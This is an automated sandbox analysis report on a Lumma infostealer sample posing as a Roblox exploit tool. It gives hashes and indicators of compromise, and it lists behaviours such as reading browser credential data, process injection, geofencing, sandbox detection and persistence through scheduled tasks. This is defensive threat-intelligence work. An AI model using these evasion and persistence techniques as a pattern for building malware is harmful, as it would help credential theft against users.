lumma | ec6df713446a8dd5efb376fbb7b444ed7e09f5cdd98c0494999b64af2e2d5537

Analysis

max time kernel
1800s
max time network
1798s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
28-03-2023 19:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

krnl_beta.exe
Size

1.8MB
MD5

3701dc535fb395d6a1fb557a3aeec5e9
SHA1

ef517659229ddc6ecfc02481c3953ac9322dae35
SHA256

ec6df713446a8dd5efb376fbb7b444ed7e09f5cdd98c0494999b64af2e2d5537
SHA512

20dc14387138f913034bd2c265156dca1f36c128c040a99d6904fe6f1830d2f98afb3dcf0553817adb66e480be7d0fb0d7df58f0feb9b007a5a6bab648b081a2
SSDEEP

49152:+P1uB0SVp4+KSxyrRUzS65+x+rnxYr9PC:+Pk0ST4+RgRUzS65+x1ZPC

Score

10^/10

lumma discovery evasion spyware stealer trojan

Malware Config

Signatures

Lumma Stealer
An infostealer written in C++ first seen in August 2022.
stealer lumma

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

Processes:

RobloxPlayerBeta.exeRobloxPlayerBeta.exe

description	pid	process	target process
PID 2240 created 3168	2240	RobloxPlayerBeta.exe	Explorer.EXE
PID 3788 created 3168	3788	RobloxPlayerBeta.exe	Explorer.EXE

Downloads MZ/PE file

Checks computer location settings 2 TTPs 14 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

krnl_beta.exeCefSharp.BrowserSubprocess.exeRobloxPlayerLauncher.exeKrnlUI.exeChromeInstall.exeRobloxPlayerBeta.exeCefSharp.BrowserSubprocess.exeRobloxPlayerLauncher.exeJailbreak script (1).tmpChromeInstall.exeRobloxPlayerLauncher.exeRobloxPlayerBeta.exeJailbreak script (1).tmpChromeInstall.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation	krnl_beta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation	CefSharp.BrowserSubprocess.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation	RobloxPlayerLauncher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation	KrnlUI.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation	ChromeInstall.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation	RobloxPlayerBeta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation	CefSharp.BrowserSubprocess.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation	RobloxPlayerLauncher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation	Jailbreak script (1).tmp
Key value queried	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation	ChromeInstall.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation	RobloxPlayerLauncher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation	RobloxPlayerBeta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation	Jailbreak script (1).tmp
Key value queried	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation	ChromeInstall.exe

Executes dropped EXE 58 IoCs

Processes:

7za.exe7za.exeKrnlUI.exeCefSharp.BrowserSubprocess.exeCefSharp.BrowserSubprocess.exeCefSharp.BrowserSubprocess.exeCefSharp.BrowserSubprocess.exeCefSharp.BrowserSubprocess.exeNew jailbreak script - Linkvertise Downloader_51-dwu1.tmpRobloxPlayerLauncher.exeRobloxPlayerLauncher.exeJailbreak script (1).exeJailbreak script (1).tmpJailbreak script (1).exemsedge.exeEdgeInstall.exeChromeInstall.exeJailbreak script (1).exeJailbreak script (1).tmpJailbreak script (1).exeJailbreak script (1).tmpEdgeInstall.exeChromeInstall.exeChromeInstall.exeNew jailbreak script - Linkvertise Downloader_51-dwu1.tmpChromeInstall.exeRobloxPlayerLauncher.exeRobloxPlayerLauncher.exeRobloxPlayerBeta.exeRobloxPlayerBeta.exeChromeInstall.exeChromeInstall.exeRobloxPlayerBeta.exeRobloxPlayerLauncher.exeRobloxPlayerLauncher.exeRobloxPlayerBeta.exeRobloxPlayerBeta.exeChromeInstall.exeChromeInstall.exeChromeInstall.exeChromeInstall.exeChromeInstall.exeChromeInstall.exeChromeInstall.exeChromeInstall.exeChromeInstall.exeChromeInstall.exeChromeInstall.exeChromeInstall.exeChromeInstall.exeChromeInstall.exeChromeInstall.exeChromeInstall.exeChromeInstall.exeChromeInstall.exeChromeInstall.exeChromeInstall.exeChromeInstall.exe

pid	process
444	7za.exe
748	7za.exe
4604	KrnlUI.exe
1660	CefSharp.BrowserSubprocess.exe
4252	CefSharp.BrowserSubprocess.exe
4908	CefSharp.BrowserSubprocess.exe
476	CefSharp.BrowserSubprocess.exe
6056	CefSharp.BrowserSubprocess.exe
5316	New jailbreak script - Linkvertise Downloader_51-dwu1.tmp
5204	RobloxPlayerLauncher.exe
5644	RobloxPlayerLauncher.exe
2156	Jailbreak script (1).exe
5544	Jailbreak script (1).tmp
5988	Jailbreak script (1).exe
4120	msedge.exe
5344	EdgeInstall.exe
5096	ChromeInstall.exe
2784	Jailbreak script (1).exe
3632	Jailbreak script (1).tmp
1552	Jailbreak script (1).exe
5808	Jailbreak script (1).tmp
484	EdgeInstall.exe
5268	ChromeInstall.exe
2240	ChromeInstall.exe
3208	New jailbreak script - Linkvertise Downloader_51-dwu1.tmp
2292	ChromeInstall.exe
6068	RobloxPlayerLauncher.exe
424	RobloxPlayerLauncher.exe
2240	RobloxPlayerBeta.exe
4808	RobloxPlayerBeta.exe
6892	ChromeInstall.exe
3300	ChromeInstall.exe
4732	RobloxPlayerBeta.exe
5144	RobloxPlayerLauncher.exe
4648	RobloxPlayerLauncher.exe
3788	RobloxPlayerBeta.exe
6016	RobloxPlayerBeta.exe
3376	ChromeInstall.exe
4744	ChromeInstall.exe
4380	ChromeInstall.exe
6684	ChromeInstall.exe
6108	ChromeInstall.exe
1780	ChromeInstall.exe
4896	ChromeInstall.exe
740	ChromeInstall.exe
4528	ChromeInstall.exe
6828	ChromeInstall.exe
2476	ChromeInstall.exe
6328	ChromeInstall.exe
5768	ChromeInstall.exe
7100	ChromeInstall.exe
6532	ChromeInstall.exe
5256	ChromeInstall.exe
5124	ChromeInstall.exe
4124	ChromeInstall.exe
6388	ChromeInstall.exe
4368	ChromeInstall.exe
6116	ChromeInstall.exe

Loads dropped DLL 59 IoCs

Processes:

krnl_beta.exeKrnlUI.exeCefSharp.BrowserSubprocess.exeCefSharp.BrowserSubprocess.exeCefSharp.BrowserSubprocess.exeCefSharp.BrowserSubprocess.exeCefSharp.BrowserSubprocess.exeNew jailbreak script - Linkvertise Downloader_51-dwu1.tmpNew jailbreak script - Linkvertise Downloader_51-dwu1.tmp

pid	process
3724	krnl_beta.exe
3724	krnl_beta.exe
4604	KrnlUI.exe
4604	KrnlUI.exe
4604	KrnlUI.exe
4604	KrnlUI.exe
4604	KrnlUI.exe
4604	KrnlUI.exe
4604	KrnlUI.exe
4604	KrnlUI.exe
4604	KrnlUI.exe
4604	KrnlUI.exe
4604	KrnlUI.exe
1660	CefSharp.BrowserSubprocess.exe
1660	CefSharp.BrowserSubprocess.exe
1660	CefSharp.BrowserSubprocess.exe
1660	CefSharp.BrowserSubprocess.exe
1660	CefSharp.BrowserSubprocess.exe
1660	CefSharp.BrowserSubprocess.exe
1660	CefSharp.BrowserSubprocess.exe
1660	CefSharp.BrowserSubprocess.exe
1660	CefSharp.BrowserSubprocess.exe
1660	CefSharp.BrowserSubprocess.exe
1660	CefSharp.BrowserSubprocess.exe
1660	CefSharp.BrowserSubprocess.exe
4252	CefSharp.BrowserSubprocess.exe
4252	CefSharp.BrowserSubprocess.exe
4252	CefSharp.BrowserSubprocess.exe
4252	CefSharp.BrowserSubprocess.exe
4252	CefSharp.BrowserSubprocess.exe
4252	CefSharp.BrowserSubprocess.exe
4252	CefSharp.BrowserSubprocess.exe
4908	CefSharp.BrowserSubprocess.exe
4908	CefSharp.BrowserSubprocess.exe
4908	CefSharp.BrowserSubprocess.exe
4908	CefSharp.BrowserSubprocess.exe
4908	CefSharp.BrowserSubprocess.exe
4908	CefSharp.BrowserSubprocess.exe
4908	CefSharp.BrowserSubprocess.exe
476	CefSharp.BrowserSubprocess.exe
476	CefSharp.BrowserSubprocess.exe
476	CefSharp.BrowserSubprocess.exe
476	CefSharp.BrowserSubprocess.exe
476	CefSharp.BrowserSubprocess.exe
476	CefSharp.BrowserSubprocess.exe
476	CefSharp.BrowserSubprocess.exe
6056	CefSharp.BrowserSubprocess.exe
6056	CefSharp.BrowserSubprocess.exe
6056	CefSharp.BrowserSubprocess.exe
6056	CefSharp.BrowserSubprocess.exe
6056	CefSharp.BrowserSubprocess.exe
6056	CefSharp.BrowserSubprocess.exe
6056	CefSharp.BrowserSubprocess.exe
5316	New jailbreak script - Linkvertise Downloader_51-dwu1.tmp
5316	New jailbreak script - Linkvertise Downloader_51-dwu1.tmp
5316	New jailbreak script - Linkvertise Downloader_51-dwu1.tmp
3208	New jailbreak script - Linkvertise Downloader_51-dwu1.tmp
3208	New jailbreak script - Linkvertise Downloader_51-dwu1.tmp
3208	New jailbreak script - Linkvertise Downloader_51-dwu1.tmp

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 3 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

RobloxPlayerLauncher.exeRobloxPlayerLauncher.exeRobloxPlayerLauncher.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	RobloxPlayerLauncher.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	RobloxPlayerLauncher.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	RobloxPlayerLauncher.exe

Drops Chrome extension 1 IoCs

Processes:

chrome.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\macjkjgieeoakdlmmfefgmldohgddpkj\1.0_0\manifest.json	chrome.exe

Drops desktop.ini file(s) 1 IoCs

Processes:

svchost.exe

description ioc process

File opened for modification C:\Users\Admin\Videos\Captures\desktop.ini svchost.exe
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

924 api.ipify.org
925 api.ipify.org

description	ioc	process
File opened for modification	C:\Users\Admin\Videos\Captures\desktop.ini	svchost.exe

flow	ioc
924	api.ipify.org
925	api.ipify.org

Suspicious use of SetThreadContext 2 IoCs

Processes:

RobloxPlayerBeta.exeRobloxPlayerBeta.exe

description	pid	process	target process
PID 2240 set thread context of 4808	2240	RobloxPlayerBeta.exe	RobloxPlayerBeta.exe
PID 3788 set thread context of 6016	3788	RobloxPlayerBeta.exe	RobloxPlayerBeta.exe

Drops file in Program Files directory 64 IoCs

Processes:

RobloxPlayerLauncher.exe

description	ioc	process
File created	C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\content\textures\StudioSharedUI\pending-light.png	RobloxPlayerLauncher.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\ExtraContent\LuaPackages\AppTempCommon\LuaApp\Actions\SetFriendCount.lua	RobloxPlayerLauncher.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\ExtraContent\LuaPackages\Packages\_Index\GraphQL\GraphQL\luaUtils\isNillish.lua	RobloxPlayerLauncher.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\content\avatar\scripts\humanoidAnimate.rbxm	RobloxPlayerLauncher.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\ExtraContent\LuaPackages\Packages\_Index\llama\llama\List\joinDeep.lua	RobloxPlayerLauncher.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\ExtraContent\LuaPackages\Packages\_Index\NetworkingGames-47864141-05d37b25\NetworkingGames\init.lua	RobloxPlayerLauncher.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\ExtraContent\LuaPackages\Workspace\Packages\_Workspace\FriendsLanding\FriendsLanding\Utils\getShowNewAddFriendsPageVariant.test.lua	RobloxPlayerLauncher.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\ExtraContent\LuaPackages\Workspace\Packages\_Workspace\VirtualEvents\VirtualEvents\Reducers\events.impl.lua	RobloxPlayerLauncher.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\ExtraContent\LuaPackages\.robloxrc	RobloxPlayerLauncher.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\ExtraContent\LuaPackages\Packages\_Index\ExperienceChat-09990ed6-a147b962\ExperienceChat\Actions\CommandAliasChanged.lua	RobloxPlayerLauncher.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\ExtraContent\LuaPackages\Packages\_Index\PrettyFormat-edcba0e9-2.4.1\PrettyFormat\plugins\ReactElement.lua	RobloxPlayerLauncher.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\ExtraContent\LuaPackages\Packages\_Index\RoduxNetworking-fe052a05-2.3.2\RoduxNetworking\POST.lua	RobloxPlayerLauncher.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\content\textures\Debugger\Breakpoints\[email protected]	RobloxPlayerLauncher.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\ExtraContent\LuaPackages\Packages\_Index\IAPExperience\IAPExperience\Generic\InsufficientRobuxPrompt.lua	RobloxPlayerLauncher.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\ExtraContent\LuaPackages\Packages\_Index\JestRunner\JestRuntime.lua	RobloxPlayerLauncher.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\ExtraContent\LuaPackages\Packages\_Index\SocialLibraries\SocialLibraries\Components\ChatBubbleContainerAutomaticSize.lua	RobloxPlayerLauncher.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\ExtraContent\LuaPackages\Packages\_Index\ExperienceChat-2bd849d2-78d25f7e\ExperienceChat\Commands\init.lua	RobloxPlayerLauncher.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\content\textures\LayeredClothingEditor\AddMore_Big_50X50_Light.png	RobloxPlayerLauncher.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\content\textures\MenuBar\icon_leave.png	RobloxPlayerLauncher.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\ExtraContent\LuaPackages\Packages\_Index\roblox_asset-card\asset-card\asset-card\Components\AssetCard.lua	RobloxPlayerLauncher.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\ExtraContent\LuaPackages\Packages\_Index\UIBlox\lock.toml	RobloxPlayerLauncher.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\ExtraContent\LuaPackages\Workspace\Packages\_Workspace\ContactImporter\ContactImporter\ContactsList\Components\ContactsGlimmer\ContactsGlimmer.lua	RobloxPlayerLauncher.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\ExtraContent\LuaPackages\Workspace\Packages\_Workspace\FriendsLanding\PermissionsProtocol.lua	RobloxPlayerLauncher.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\ExtraContent\LuaPackages\Workspace\Packages\_Workspace\Squads\Squads\SquadLobby\Components\SquadLobbyActionBar\SquadLobbyActionBar.test.lua	RobloxPlayerLauncher.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\content\textures\AnimationEditor\button_control_start.png	RobloxPlayerLauncher.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\ExtraContent\LuaPackages\Workspace\Packages\_Workspace\VirtualEvents\VirtualEvents\Reducers\rsvps.lua	RobloxPlayerLauncher.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\content\textures\MaterialManager\Texture_None.png	RobloxPlayerLauncher.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\content\textures\ui\Emotes\[email protected]	RobloxPlayerLauncher.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\ExtraContent\LuaPackages\Packages\_Index\ReactReconciler-9c8468d8-8a7220fd\ReactReconciler\ReactFiberLazyComponent.new.lua	RobloxPlayerLauncher.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\ExtraContent\LuaPackages\Packages\_Index\RecordPlayback\RecordPlayback\RequestFormatter.lua	RobloxPlayerLauncher.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\ExtraContent\LuaPackages\Packages\_Index\RoactCompat-a406e214-4230f473\RoactCompat\Portal.lua	RobloxPlayerLauncher.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\ExtraContent\LuaPackages\Workspace\Packages\_Workspace\ExternalContentSharingProtocol\ExternalContentSharingProtocol\ExternalContentSharingProtocolTypes.lua	RobloxPlayerLauncher.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\ExtraContent\LuaPackages\Workspace\Packages\_Workspace\GameDetailRodux\GameDetailRodux\Reducers\GameDetailReducer.lua	RobloxPlayerLauncher.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\content\textures\DeveloperFramework\slider_knob_ouline.png	RobloxPlayerLauncher.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\ExtraContent\LuaPackages\Workspace\Packages\_Workspace\SocialTab\SocialTab\User\sortByPresenceAndDisplayName.test.lua	RobloxPlayerLauncher.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\ExtraContent\LuaPackages\Workspace\Packages\_Workspace\VirtualEvents\VirtualEvents\Components\AttendanceCount.lua	RobloxPlayerLauncher.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\ExtraContent\LuaPackages\Workspace\Packages\_Workspace\SocialLuaAnalytics\SocialLuaAnalytics\init.lua	RobloxPlayerLauncher.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\content\textures\ui\PlayerList\[email protected]	RobloxPlayerLauncher.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\ExtraContent\textures\ui\LuaApp\icons\[email protected]	RobloxPlayerLauncher.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\ExtraContent\LuaPackages\Packages\_Index\RoduxSquads\RoduxSquads\init.lua	RobloxPlayerLauncher.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\ExtraContent\LuaPackages\Packages\_Index\SocialLibraries\SocialLibraries\populate\populateDictionaryFromIds.lua	RobloxPlayerLauncher.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\ExtraContent\LuaPackages\Workspace\Packages\RoactNavigation.lua	RobloxPlayerLauncher.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\ExtraContent\LuaPackages\Workspace\Packages\Squads.lua	RobloxPlayerLauncher.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\ExtraContent\LuaPackages\Workspace\Packages\_Workspace\GraphQLServer\GraphQLServer\StarterScripts\HttpServerStarterScript.lua	RobloxPlayerLauncher.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\content\textures\9SliceEditor\[email protected]	RobloxPlayerLauncher.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\ExtraContent\LuaPackages\Workspace\Packages\_Workspace\PYMKCarousel\PYMKCarousel\Common\Constants.lua	RobloxPlayerLauncher.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\content\avatar\scripts\module_autopole.lua	RobloxPlayerLauncher.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\content\textures\ui\VoiceChat\New\[email protected]	RobloxPlayerLauncher.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\ExtraContent\LuaPackages\Packages\_Index\LuauPolyfill-2fca3173-0.3.4\LuauPolyfill\Array\some.lua	RobloxPlayerLauncher.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\ExtraContent\LuaPackages\Workspace\Packages\_Workspace\AppCommonLib\AppCommonLib\Text.lua	RobloxPlayerLauncher.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\ExtraContent\LuaPackages\Workspace\Packages\_Workspace\FriendsLanding\FriendsLanding\Components\EmptyResultsView\init.lua	RobloxPlayerLauncher.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\ExtraContent\LuaPackages\Workspace\Packages\_Workspace\SocialLuaAnalytics\SocialLuaAnalytics\TestingAnalytics\validateEventList.spec.lua	RobloxPlayerLauncher.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\content\avatar\compositing\CompositPantsTemplate.mesh	RobloxPlayerLauncher.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\content\textures\ui\PlayerList\[email protected]	RobloxPlayerLauncher.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\ExtraContent\LuaPackages\Packages\_Index\RoduxFriends-aa874f8b-86a611f7\RoduxFriends\Reducers\Friends\countsByUserId.lua	RobloxPlayerLauncher.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\ExtraContent\LuaPackages\Workspace\Packages\_Workspace\FriendsCarousel\FriendsCarousel\Components\Carousel\CarouselWithLoadingTimer.test.lua	RobloxPlayerLauncher.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\ExtraContent\LuaPackages\Workspace\Packages\_Workspace\GameProtocol\MessageBus.lua	RobloxPlayerLauncher.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\ExtraContent\LuaPackages\Workspace\Packages\_Workspace\SetAlias\Dev\SocialTestHelpers.lua	RobloxPlayerLauncher.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\content\textures\DevConsole\Filter-stroke.png	RobloxPlayerLauncher.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\PlatformContent\pc\textures\corrodedmetal\reflection.dds	RobloxPlayerLauncher.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\ExtraContent\LuaPackages\Packages\Thumbnailing.lua	RobloxPlayerLauncher.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\ExtraContent\LuaPackages\Packages\_Index\DomTestingLibrary\DomTestingLibrary\types\suggestions.lua	RobloxPlayerLauncher.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\ExtraContent\LuaPackages\Workspace\Packages\_Workspace\PYMKCarousel\PYMKCarousel\Analytics\useUserSeenEvent.test.lua	RobloxPlayerLauncher.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\content\textures\ui\dialog_purpose_help.png	RobloxPlayerLauncher.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 3 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
6020	5316	WerFault.exe	New jailbreak script - Linkvertise Downloader_51-dwu1.tmp
760	3208	WerFault.exe	New jailbreak script - Linkvertise Downloader_51-dwu1.tmp
6964	4808	WerFault.exe	RobloxPlayerBeta.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

dwm.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID	dwm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000	dwm.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags	dwm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	dwm.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags	dwm.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\HardwareID	dwm.exe

Checks processor information in registry 2 TTPs 14 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

svchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	svchost.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	svchost.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	svchost.exe
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	svchost.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	svchost.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	svchost.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	svchost.exe

Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

5728 schtasks.exe
5188 schtasks.exe
4600 schtasks.exe
1928 schtasks.exe
920 schtasks.exe
4028 schtasks.exe
Delays execution with timeout.exe 5 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid process

4748 timeout.exe
6120 timeout.exe
1476 timeout.exe
3136 timeout.exe
456 timeout.exe

pid	process
5728	schtasks.exe
5188	schtasks.exe
4600	schtasks.exe
1928	schtasks.exe
920	schtasks.exe
4028	schtasks.exe

pid	process
4748	timeout.exe
6120	timeout.exe
1476	timeout.exe
3136	timeout.exe
456	timeout.exe

Enumerates system info in registry 2 TTPs 20 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exechrome.exemsedge.exechrome.exechrome.exechrome.exedwm.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
